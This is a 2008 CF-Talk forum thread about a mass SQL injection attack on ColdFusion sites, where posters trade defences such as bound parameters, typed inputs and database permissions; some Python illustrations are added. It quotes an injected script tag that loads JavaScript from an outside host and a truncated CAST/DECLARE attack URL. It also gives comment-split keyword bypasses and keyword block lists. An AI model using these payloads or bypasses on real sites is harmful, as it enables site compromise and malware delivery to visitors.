I am still working out the details but it seems to be working: I use
a server variable that holds a list of 20 banned IP addresses. When
a new IP appears, I add it to the end of the list and remove the first one..
seems to be working nicely.
I fixed the problem of banning people with the word Declare in the
form submission.. I now look for ";declare"
Keywords and banning IPs by themselves are not the answer - I
understand that - but along with the changes to the DB permissions,
use of sqlqueryparameters and cfparams, they add another layer of defense..
I can't believe this isn't a big news story.. it has been the focus
of my life for the last 48 hours:)
>Second and finally, this attack is a zombie attack using computers
>throughout the net infected with an adware program of some sort. It is not
>likely that banning IP addresses will have any significant impact on the
>number of attacks as their origin will be moving target.
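Al's rolling ban list (a server-scope list of 20 addresses, newest in and oldest out), combined with the one-hour ban and the ";DECLARE" / "CHAR( " / ";SET " / "CAST( " fragments he mentions in his post #309554, as an added Python example; this is not code from the thread and not CFML. The 192.0.2.x addresses and the query strings are constructed test values, and the `BanList` and `handle_request` names are my own.

```python
from collections import deque
import time

BAN_LIST_SIZE = 20       # Al keeps a rolling list of 20 addresses
BAN_SECONDS = 60 * 60    # and suggests banning for about an hour

# Fragments from Al's post #309554; ";declare" rather than "declare" so a
# product description containing the word on its own is not banned.
SUSPECT_FRAGMENTS = (";declare", "char( ", ";set ", "cast( ")


class BanList:
    """Bounded, time-limited IP ban list (hypothetical helper): when the
    list is full the oldest entry is evicted, and every entry lapses
    after ttl seconds so a one-off visitor is not banned for good."""

    def __init__(self, size=BAN_LIST_SIZE, ttl=BAN_SECONDS):
        self._entries = deque(maxlen=size)   # (ip, banned_at), oldest first
        self._ttl = ttl

    def ban(self, ip, now=None):
        """Add ip to the end of the list; re-banning an address refreshes
        its timestamp instead of storing it twice."""
        now = time.time() if now is None else now
        kept = [e for e in self._entries if e[0] != ip]
        self._entries = deque(kept, maxlen=self._entries.maxlen)
        self._entries.append((ip, now))

    def is_banned(self, ip, now=None):
        now = time.time() if now is None else now
        return any(e_ip == ip and now - t < self._ttl
                   for e_ip, t in self._entries)

    def active(self, now=None):
        """Addresses whose ban has not yet lapsed."""
        now = time.time() if now is None else now
        return [e_ip for e_ip, t in self._entries if now - t < self._ttl]


def looks_like_attack(query_string):
    """Al's keyword filter applied to the raw query string."""
    q = query_string.lower()
    return any(frag in q for frag in SUSPECT_FRAGMENTS)


def handle_request(banlist, ip, query_string, now=None):
    """Decision for one request: 'banned' if the address is already on the
    list, 'blocked' (and the address is banned) if the query string
    matches, otherwise 'allowed'."""
    if banlist.is_banned(ip, now):
        return "banned"
    if looks_like_attack(query_string):
        banlist.ban(ip, now)
        return "blocked"
    return "allowed"


if __name__ == "__main__":
    bl = BanList()
    # Constructed request sequence from one address (TEST-NET range).
    print(handle_request(bl, "192.0.2.10", "id=5", now=0.0))
    print(handle_request(bl, "192.0.2.10", "id=5';declare @s char(4000)", now=1.0))
    print(handle_request(bl, "192.0.2.10", "id=5", now=2.0))
    print(handle_request(bl, "192.0.2.10", "id=5", now=3601.0))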
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309562
Gabriel,
Can you give me a rundown on how a string like "dr/*foo*/op" would translate
as drop? Trying this in query analyzer does not seem to work.
se/*foo*/lect * from users
where archivebit = 1
order by firstname
Doesn't work...
So I created a table called foo and then ran this query like your example:
dr/*foo*/op table foo - still no dice
I've never seen successful syntax like that used in t-sql.
The function code does indeed generate false positives and it is a stop gap
to be sure... But I'm not so sure getting around it is as easy as you seem
to indicate.
Perhaps using inline comments is a method used against a different platform?
I'd be interested to find out.
Moreover, the point has been made "responsibly" over and over and over again
that these measures are NOT the fix - simply a way to stem the tide
temporarily while a defense (hopefully a defense in depth) is implemented.
Most of the folks on here who have been victimized by this malicious code
need a way to stop THIS attack while they finally get their code in order...
That's the purpose of these stop gap measures. Yes it's true the next attack
might step right over them - but these poor site owners need to get a breather
so they can make those other more important necessary changes. That's real
world in the trenches... No one is advocating this sanitizing function as a
panacea - merely another arrow in the quiver.
My suggestion to you is that since you feel you have a better mouse trap,
rather than just pepper the list with pedantic criticism, post some of that
fancy regex code that you think would be a better stop gap :) That might
help some of the folks who actually need your advice. If you post such a
function it would be much appreciated (I'd certainly like it).
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: Gabriel
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309560
With this latest spate of SQL attacks it has at least alerted CF (and non CF
coders hopefully) to the importance of sql injection and input sanitisation.
However I am noticing that almost all of the drop-in 'patches', almost all
of them seem to be straight list/array searches and there is almost no use
of regular expressions, meaning that these 'solutions' can barely even be
considered as suitable stop gaps until more appropriate measures can be
taken (cfqueryparam, sql permissions, etcetera) as they really can only stop
the most basic attempts and are likely to produce an inordinate number of
false positives (someone earlier noted that an admin was blacklisted for
using declare in a perfectly acceptable context).
It seems to me that such a knee jerk reaction and placing half thought out
measures in place almost does more harm than good in that it leaves people
with a false sense of security. Take the following code as case in point;
function IsSQLInject(input) {
var listSQLInject =
"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,drop,--,'";
var arraySQLInject = ListToArray(listSQLInject);
var i = 1;
for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {
if(findNoCase(arraySQLInject[i], input)) return true;
}
return false;
}
Running this function over any user input scope will flag every input that
contains one of the listed strings, i.e. 'Casting sugar', 'selectable
criteria', 'Name: Grant Thompson', so on and so forth...
But at least you're secure, right?
Dr/*foo*/op table orders;
The simplest obfuscation of the command using basic tools and the function
is rendered useless.
Conclusion? You're stopping legitimate use and still leaving a wide open
door to any hacker willing to put in 30 seconds effort. How long until
someone rewrites the current attack pattern and uses the above method to
bypass all of the shiny new keyword scanners? Dec/*can't see me*/lare @s =
...
That's all without even touching upon encoding.
I'm not claiming to have the ideal patch, I'm not even claiming to have been
the first to notice these things - posts are on many CF blogs detailing
these issues in a far more articulate manner, but I think that advocating
simple keyword scanners in this list is irresponsible, bad advice can be
worse than no advice at all. All 'senior' CF programmers either do, or
should know better.
Please note that I mean no offence to anyone on this list (or anywhere else
for that matter).
Regards,
Gabriel
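An added example, not part of the thread and written in Python rather than CFML, that ports the keyword list from the IsSQLInject UDF Gabriel quotes in post #309560 and runs it over a constructed FORM scope. It shows the false positives he lists ("Casting...", "Grant Thompson", plus any apostrophe) beside the "Dr/*foo*/op" value the list misses, and adds a comment-stripping normalisation step (my own addition, as is the `scan_scope` helper) that makes the split keyword visible again; the legitimate values are still blocked, which is the point of his post #309564 that a word list is at best a stop gap. Field names and sample values are constructed.

```python
import re

# Keyword list copied from the IsSQLInject UDF quoted in the thread.
SQL_INJECT_LIST = ("cast,exec,execute,sp_executeSQL,revoke,grant,select,"
                   "insert,update,delete,drop,--,'")
KEYWORDS = [k.lower() for k in SQL_INJECT_LIST.split(",")]

# /* ... */ block comments, possibly spanning lines.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def is_sql_inject(value: str) -> bool:
    """Port of the list/array scanner: flags the input if any keyword
    occurs anywhere in it, case-insensitively (like findNoCase)."""
    lowered = value.lower()
    return any(keyword in lowered for keyword in KEYWORDS)


def normalise(value: str) -> str:
    """Strip block comments and collapse runs of whitespace, so a keyword
    split by a comment ("Dr/*foo*/op") is seen whole by the scanner."""
    without_comments = BLOCK_COMMENT.sub("", value)
    return re.sub(r"\s+", " ", without_comments).strip()


def is_sql_inject_normalised(value: str) -> bool:
    """Same keyword test, applied after normalisation."""
    return is_sql_inject(normalise(value))


def scan_scope(scope: dict) -> dict:
    """Run both scanners over a request scope (URL or FORM, as a dict)
    and return the names of the fields each one flags."""
    return {
        "plain": sorted(k for k, v in scope.items() if is_sql_inject(v)),
        "normalised": sorted(k for k, v in scope.items()
                             if is_sql_inject_normalised(v)),
    }


# Constructed FORM scope: three legitimate values of the kind the thread
# mentions, one harmless value, and the obfuscated command from Gabriel's post.
SAMPLE_FORM = {
    "comment": "Casting about for a solution",   # legitimate, contains "cast"
    "name": "Grant Thompson",                    # legitimate, contains "grant"
    "surname": "O'Brien",                        # legitimate, contains "'"
    "ok": "plain text with no keywords",         # passes both scanners
    "evil": "Dr/*foo*/op table orders;",         # evades the plain scanner
}

if __name__ == "__main__":
    for scanner, flagged in scan_scope(SAMPLE_FORM).items():
        print(f"{scanner:10s} flags: {flagged}")
```

Normalising before the scan closes the specific comment-split trick, but it does nothing for the three legitimate values, and a bound parameter (cfqueryparam) would have stored all five strings safely without any scan at all.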
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309556
Good list al - but I have a couple of revisions for you :)
First, this code:
<cfparam name="id" default="0" type="integer"/>
Creates a variable in the VARIABLES scope. If you are scoping your variables
(as in "#url.id#") then this will have no effect on that scope - or the form
scope. If you are not scoping your variables then shame on you :)
Second and finally, this attack is a zombie attack using computers
throughout the net infected with an adware program of some sort. It is not
likely that banning IP addresses will have any significant impact on the
number of attacks as their origin will be moving target.
-Mark
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309554
That may help with this particular attack, but I already have seen 2
versions of it today.. Both happened to have the "EXEC("
but there are variations that use other key words.
The correct way (which unfortunately I found out through failure:) is:
1. Run a scanner like: http://qpscanner.riaforge.org/ and fix EVERY
query it finds so that it uses cfqueryparam
2. Do a search for every cfparam in your code and add the correct
type. For example:
<cfparam name="id" default="0" type="integer">
That will prevent people from adding anything to the end of the integer..
3. Set up a sitewide error handler to email you when a problem
occurs... you will be amazed at how many attempts that cfparam catches..
4. Set up your database so that the user you use with coldfusion is
denied permission to all of the system tables and stored procedures
that you do not use.
5. I use a filter similar to what you mention below, in the
application.cfm or application.cfc file.. mine uses a few other
words.. such as ";DECLARE" , "CHAR( " , ";SET " and "CAST( " and I
am also working on a system of banning the bad IP addresses on the
entire server for a while.. figuring if they hit a protected page,
why let them keep trying.. I am collecting data on the attack, and it
appears that an IP address is only used 2-15 times within a 1 minute
period.. then it is never used again. So it looks like banning the
IP for an hour should be ok..
6. I set up an automated task to check 10 different tables for my own
entry every 15 minutes - checking that the email address and website
address hasn't changed. If it does, I get notified..
7. Make sure that you backup your website and database as frequently
as possible. Keep old versions in case the next attack just changes
a few numbers here and there instead of being this obvious.
At 08:30 PM 7/23/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
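Steps 1 and 2 of Al's list (cfqueryparam on every query, and a typed cfparam on ids) as an added example in Python with sqlite3; this is not code from the thread and not CFML, but the same two controls. `product_by_id_concat` is the unparameterised shape the QueryParam scanner looks for, `is_valid_integer` does what `<cfparam type="integer">` does, and `product_by_id_param` / `update_description_param` bind the value the way cfqueryparam does. The table, its rows and the request values are constructed; the `';DECLARE @S CHAR(4000);--` string is shaped like the payload quoted elsewhere in the thread, not the real one.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory product table; one description legitimately
    contains the word 'Declare', as in the banned owner's case."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, "
                 "name TEXT, description TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", [
        (1, "Widget", "Declare your love for widgets"),
        (2, "Gadget", "A gadget"),
        (3, "Gizmo", "A gizmo"),
    ])
    return conn


def product_by_id_concat(conn, raw_id: str):
    """The unparameterised pattern the scanner hunts for: the request
    value is spliced into the SQL text, so the database parses it as SQL."""
    sql = "SELECT id, name FROM product WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def is_valid_integer(raw: str) -> bool:
    """What <cfparam type="integer"> enforces: only a whole number passes,
    so nothing can be tacked on to the end of the id."""
    return re.fullmatch(r"[+-]?[0-9]+", raw.strip()) is not None


def require_integer(raw: str) -> int:
    if not is_valid_integer(raw):
        raise ValueError(f"id must be an integer, got {raw!r}")
    return int(raw)


def product_by_id_param(conn, raw_id: str):
    """Type check first, then a bound parameter (cfqueryparam): the value
    never becomes part of the SQL text."""
    pid = require_integer(raw_id)
    return conn.execute("SELECT id, name FROM product WHERE id = ?",
                        (pid,)).fetchall()


def update_description_param(conn, pid: int, text: str) -> str:
    """Bound text parameter: hostile-looking text is stored as data, not
    executed, and is returned unchanged."""
    conn.execute("UPDATE product SET description = ? WHERE id = ?",
                 (text, pid))
    return conn.execute("SELECT description FROM product WHERE id = ?",
                        (pid,)).fetchone()[0]


if __name__ == "__main__":
    conn = make_db()
    print(product_by_id_concat(conn, "2 OR 1=1"))   # every row: input parsed as SQL
    print(product_by_id_param(conn, "2"))           # [(2, 'Gadget')]
    print(is_valid_integer("2 OR 1=1"))             # False: rejected before the query
    # Constructed fragment shaped like the thread's ';DECLARE @S ...' payload
    print(update_description_param(conn, 2, "';DECLARE @S CHAR(4000);--"))
```

With the typed check in front and the value bound, the string containing DECLARE is just a description; the word-list scanners in this thread would have flagged it.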
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309553
Excuse me... But why are you checking script_name and Path_info for "EXEC("
... Both of these are generated on the web server - not sent by the
browser... So I'd be interested to know your reasoning. Also, form elements
are not part of the "query_string" since they are passed in a form "body"
container separate from the header.
If you are looking for a stop gap try the isSQLInject function on cflib.org
(and make sure you add declare, cast and exec to the list). I posted a
snippet on my blog that uses this UDF like so:
<!--- check the URL scope --->
<cfif isDefined('url')>
<cfloop collection="#url#" item="uItem">
<cfif isSQLInject(url[uItem])>
<cfabort>
<!--- ... or whatever action you want --->
</cfif>
</cfloop>
</cfif>
<!--- check the FORM scope --->
<cfif isDefined('form')>
<cfloop collection="#form#" item="fItem">
<cfif isSQLInject(form[fItem])>
<cfabort>
<!--- ... or whatever action you want --->
</cfif>
</cfloop>
</cfif>
Of course if you use cookies inside of queries, or copy stuff to the request
or attributes scope (a la fusebox 2-3) then you might need additional
iterations. In my opinion this is a stop gap measure and should not be used
to 'stand in' for not using bound variables and actual validation routines
based on the form being submitted or url being fetched. You should still
redress the issues with your code in spite of measures like this one. In
addition - looping through available user input scopes can be expensive and
it can result in false positives. If someone submits a comment in a forum
that says they are "Casting about for a solution" or that they "declare the
issue resolved" then these items will be trapped unnecessarily by the code
above. If the vars are properly bound however, they will be safely inserted
into the DB as part of the comments.
-Mark
=========== here's the modified UDF ===========
<cfscript>
/**
* Tests a string, one-dimensional array, or simple struct for possible SQL
injection.
*
* @param input String to check. (Required)
* @return Returns a boolean.
* @author Will Vautrain (vautrain@yahoo.com)
* @version 1, July 1, 2002
*/
function IsSQLInject(input) {
var listSQLInject =
"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,drop,--,'";
var arraySQLInject = ListToArray(listSQLInject);
var i = 1;
for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {
if(findNoCase(arraySQLInject[i], input)) return true;
}
return false;
}
</cfscript>
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309552
What about if I put:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
in all my cf files on my web site, and if a hacker is going to try to run any of these
files, for example:
index.cfm?+code, mail.cfm?+code etc. Basically it attacks everything indexed on Google,
but if you put it in all of the files, it should abort the connection
every time one of the files is executed and then no query will be
executed....it should work...what do you think?
Radek
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309551
If you are still being affected by the attack, then you still have one or
more vulnerable queries somewhere with access to that database.
Did you use a code scanner like QueryParam Scanner from RiaForge to search
the ENTIRE code base for missing cfqueryparams?
Also, find out the user your ColdFusion data sources use to access the
database. Revoke select permissions to sysobjects and syscolumns to that
user.
This will cause an error to occur when the attack hits a vulnerable query.
(Run a test to confirm this) Do you have a site-wide error handler that
E-mails you when errors occur. This will tip you off to where the hackers
are gaining entry.
~Brad
How does it defeat the cfquery param tags that are now in all my queries?
Author: Bo Reahard
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309550
On 7/23/2008 at about 1:30 I had a second sql injection attack. On 7/21/2008 I
had fixed the database for this site from the first attack and I had fixed all
the cfqueries with the proper cfquery param tags and included <cfif
cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> in my
application.cfm file. Today the code inserted was a little different, it was
"></title><script src="http://abc.verynx.cn/w.js"></script> - is this attack
still going on? How does it defeat the cfquery param tags that are now in all my
queries?
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309549
> however, one of the owners got banned when
> he included the word "Declare" in a product description:)
Wow-- that sucks. This is a classic reason why that sort of blocking method
is in my opinion only useful for a temporary stop gap. It treats the symptom
more than the problem and is prone to false alarms.
> for this attack, I am thinking wouldn't it be
> wise to remove permission to use the sysobjects
> and syscolumns from the user I access the MS SQL
> server with from CF? (In other words, I am
> assuming that cf does not need access to these tables - does it?)
>
I would absolutely recommend removing permissions to those system tables. I
would also recommend blocking operations such as drop, grant, revoke, and
alter. If you have part of your application that needs that kind of
functionality, it is better to create a separate datasource with escalated
privileges and use it sparingly.
~Brad
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309548
One of my websites got hit.. I always use
cfqueryparam - at least for the last few years,
but some old code (this website started with
version 1 of CF) was still hanging around that
was unprotected. I used that scanning tool and it
found about 20 unprotected queries out of about 20,000...
anyway - I set up a filter in the application.cfm
to watch for a few of these bad keywords..and
temporarily ban those IPs.. I am getting hit a
few times a minute now.. on all of the websites I
run.. however, one of the owners got banned when
he included the word "Declare" in a product description:)
for this attack, I am thinking wouldn't it be
wise to remove permission to use the sysobjects
and syscolumns from the user I access the MS SQL
server with from CF? (In other words, I am
assuming that cf does not need access to these tables - does it?)
----- Excess quoted text cut - see Original Post for more -----
Author: Martin Schmelzle
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309543
Hi Dave,
I have an older cf auction application that is being hit with this attack. I'm
running URLScan on my win2k server running CF5 server w/ sql2k. What is the max
length of URL you would recommend? Any deny verbs, headers, etc you would
recommend so I can compare to my urlscan.ini. I added the script below posted on
this list to my application.cfm but I think it might need to go into the
aps-global.cfm...
----- Excess quoted text cut - see Original Post for more -----
Thanks,
Martin
----- Excess quoted text cut - see Original Post for more -----
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309531
>Not dissing anyone. Just curious. With all the ORM's and code generators out
>there, why are you not using cfqueryparam?
One reason I can think of is that until recently you could not use it with cached
queries. For those of us that have to support older versions of ColdFusion, it's
definitely a dilemma in terms of trying to provide the often considerable
performance benefit that caching provides while not being able to use cfqp. It's
relatively easy to sanitize numeric inputs with a Val() function but strings are
a bit harder to deal with...as this has shown.
Author: Jesse Beckton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309504
Doooooooh!
I just got through cleaning the results of this attack out of a clients database!
They have a very old CF application that was poorly written and has no
cfqueryparams!
I must have cleaned 10 tables so far... Funny part is, I warned my client several
months ago after seeing evidence of a sql injection in his DB that he needed to
at the very least purchase an application firewall to protect his sites. After
running a trial of a popular application firewall he decided not to spend the
money or try to deal with the ongoing tweaking required so that his site visitors
are not affected by the firewall. Needless to say his security holes just cost
him a lot more money and down time due to this latest attack.
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309455
Let me just jump in with a quick question or two about this...
Is this something that using cfqueryparam doesn't take care of?
Is this a serious enough problem that we need to use such measures
as Portcullis to defend our sites?
I do see "form injection" attempts at times through forms on my
clients' sites, but they've always been caught by cfqueryparam
and haven't caused any problems.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309452
I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
your site.
http://portcullis.riaforge.org/
--------------------------
Portcullis is a CFC based url,form,cookie filter to help protect against SQL
Injection and XSS (Cross Site Scripting) attacks. This CFC can help filter
input, strip tags and escape HTML based on internal settings. It can also
log attacks and temporarily block future attempts based on a set time limit.
Portcullis can be installed into any ColdFusion application as a simple
shared scoped singleton.
1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII
injection attack. Also, fixed a bug reported if ampersands are in the url
string it sometimes mixes up the variable naming
-------------------------------
1.0.5 was updated yesterday. Coincidence? I think not. ;)
~G~
--
"If everything seems under control, you're not going fast enough"
-- Mario Andretti
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309450
No, because those sites are still using the URL variables, just not visibly.
andy
Here's another question. Are sites that rewrite URLs (i.e., no .cfm
extension in the url) more or less NOT being hit by these malbots?
Author: Jerry Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309444
The purpose of the hack is to change your website, so that each visitor is
hit with a series of browser exploit attempts while reading your website.
Some of the exploits attempted are handled by the MS patch. Some are not.
(Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton,
pxhack)
----- Excess quoted text cut - see Original Post for more -----
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309437
This attack has nothing to do with elevation of privilege. It simply
tacks on a SQL procedure to a query existing on the page already. This
procedure then runs through the tables/columns in the database
appending text the end of content in varchar fields. The text appended
varies, but what I've seen is a javascript file call, that would run
when the affected content was displayed in a browser.
I can't see how that security patch would have anything to do with it.
(Please enlighten me if I'm wrong.)
> Can someone confirm that having applied the Microsoft patch(es) mentioned on
> http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx
> is sufficient to protect against attacks like
these?
Author: Andreas Ertle
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309430
>Just was looking at a 'user monitor' page on one of my sites and I saw the
>url string below being called. I've seen several sql injection urls before,
>but what the heck are they trying to accomplish here? Everything is
>cfqueryparam'ed. Thanks, Che
>
>/rss.cfm?';DECLARE @S CHAR(4000);SET
>@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
Hello,
naive question maybe, nevertheless:
Can someone confirm that having applied the Microsoft patch(es) mentioned on
http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx
is sufficient to protect against attacks like these?
Who had applied the patch(es) but still was attacked and infected successfully?
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309429
Always sanitize your data entry.
http://xkcd.com/327/
Performance is a moot point when you have to sanitize/rebuild your entire
database cuz you got hacked.
Besides shouldn't you be abstracting you database layer and using
cfqueryparam in your CFC's as a matter of habit?
Not dissing anyone. Just curious. With all the ORM's and code generators out
there, why are you not using cfqueryparam?
Seriously, CFC Generator saved my ass with this hack attack. Thanx Brian!
~G~
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309428
Regarding performance... On high traffic sites with a good SQL server
cfqueryparam can result in 10 to sometimes as much as 40 percent performance
increase - especially if your SQL server is finely tuned and has good
indexing and schema practices.
In addition, I don't find the queries less readable. In fact, the extra
attribute information tells me more about the schema without having to look
up the tables. The use of snippets means it takes no time at all to use
them. In short, I can find no legitimate reason to NOT use cfqueryparam.
Your arguments below lead to code that is simply unnecessarily inconsistent.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
>>Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
Even with something like
UPDATE myTable SET myDate = <cfqueryparam value = "#now()#" CFSQLType =
"CF_SQL_TIMESTAMP">?
OR this:
UPDATE myTable SET myValue = <cfqueryparam value =
"#someOtherQuery.someOtherValue#" CFSQLType = "CF_SQL_INTEGER ">?
Just ridiculous.
OK, it "improves performance", if you care about micro seconds, but there is
no security aspect here.
The increase of performance can make a significant difference only for very
big queries or very repetitive code.
As the docs say: "Bind variable usage enhances performance when executing a
cfquery statement multiple times."
Otherwise, the advantage is only for security purpose,... and there is a
risk only for variables set by a visitor.
If the content is set by your CF program itself, where is the risk? It is
like putting a lock on an empty box.
Personally, I care more about code readability than useless security.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309427
>>For those of you who are actually trying to learn and become better
programmers/developers,
I used to be a teacher myself, and I never agreed with this way of teaching
beginners to do things mechanically without thinking about the reasons and
the pros and cons.
If you teach beginners to act this way, they will remain beginners all
their lives.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309426
>>I too was concerned about your solution being
put forward in a security context...because it's not.
Yes it is. It serves two purposes:
1. check if the value is correct, and 2. detect an attack if the value
is not correct.
But if the value is not correct (a positive integer), the query is not
even executed, now THAT'S security!
Using CFQUERYPARAM would do only part 1.
Now I could also check for a potential attack AFTER the query has thrown an
error. Sure.
I find it more efficient NOT TO run the query at all, and easier to write
than using <CFTRY... <CFCATCH for every query.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309425
>>Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
Even with something like
UPDATE myTable SET myDate = <cfqueryparam value = "#now()#" CFSQLType
= "CF_SQL_TIMESTAMP">?
OR this:
UPDATE myTable SET myValue = <cfqueryparam value =
"#someOtherQuery.someOtherValue#" CFSQLType = "CF_SQL_INTEGER ">?
Just ridiculous.
OK, it "improves performance", if you care about micro seconds, but
there is no security aspect here.
The increase of performance can make a significant difference only for
very big queries or very repetitive code.
As the docs say: "Bind variable usage enhances performance when
executing a cfquery statement multiple times."
Otherwise, the advantage is only for security purpose,... and there is a
risk only for variables set by a visitor.
If the content is set by your CF program itself, where is the risk? It
is like putting a lock on an empty box.
Personally, I care more about code readability than useless security.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309423
>>....and no...not retarded....just tactless
Your vocabulary is definitely richer than mine, maybe less efficient,
but richer ;-)
Author: Dan Vega
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309422
Firewall solution is another way, we block anything in the url with CAST( OR
EXEC(
Thank You
Dan
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309420
> We are going to be reading about this on all the tech rags
> like Info World and Zdnet tomorrow.
It was in those a week or two ago, already. This is not new. Originally, it
primarily targeted "classic" ASP apps. HP released a free vulnerability
scanner called Scrawlr in response.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309419
I went to look at a site I do side work for and they got hit. No... not my
stuff. :)
We are going to be reading about this on all the tech rags like Info World
and Zdnet tomorrow.
ZDnet will prolly post it with a H1 tag with a blink tag for good measure.
One of the things about SQL server I never liked was how you could run more
than one sql script at a time. Mysql doesn't allow you to do this LTIL.
cfqueryparam... me love you long time.
~G~
"If everything seems under control, you're not going fast enough"
-- Mario Andretti
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309416
Cache result sets manually. You can wrap that up nicely in a custom
tag.
~Brad
I am now
working with an app that uses cached queries regularly, and is still
on CF7. You cannot use cfqueryparam with a cached query in CF7. What
are the alternatives?
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309415
Hmm, I sure hope you replaced the exec with a print statement....
Brad,
This took care of part of the issue... but not all.
I get this error:
Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.
Does anyone know what I need to do to get around the error above?
thanks!
>Works great for me. You have to remove the extra line breaks though.
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309414
As a rule I use cfqueryparam. And generally try to stick to stored
procedures, and use cfstoredproc/cfprocparam. However, I am now
working with an app that uses cached queries regularly, and is still
on CF7. You cannot use cfqueryparam with a cached query in CF7. What
are the alternatives?
-KJ
> Bottom line: ***always*** use cfqueryparam. Period. There are no
> acceptable "exceptions to the rule".
Author: Bryan Stevenson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309413
Ahhh...so there were other reasons for doing what you are doing....that
makes much more sense.
As Dave already said....I too was concerned about your solution being
put forward in a security context...because it's not.
It is of course a valid way to deal with server load issues you have
experienced by filtering out the garbage requests before they become an
errors at the query end of things.
...and no...not retarded....just tactless ;-)
Cheers
-
Bryan Stevenson B.Comm.
VP & Director of E-Commerce Development
Electric Edge Systems Group Inc.
phone: 250.480.0642
fax: 250.480.1264
cell: 250.920.8830
e-mail: bryan@electricedgesystems.com
web: www.electricedgesystems.com
Notice:
This message, including any attachments, is confidential and may contain
information that is privileged or exempt from disclosure. It is intended
only for the person to whom it is addressed unless expressly authorized
otherwise by the sender. If you are not an authorized recipient, please
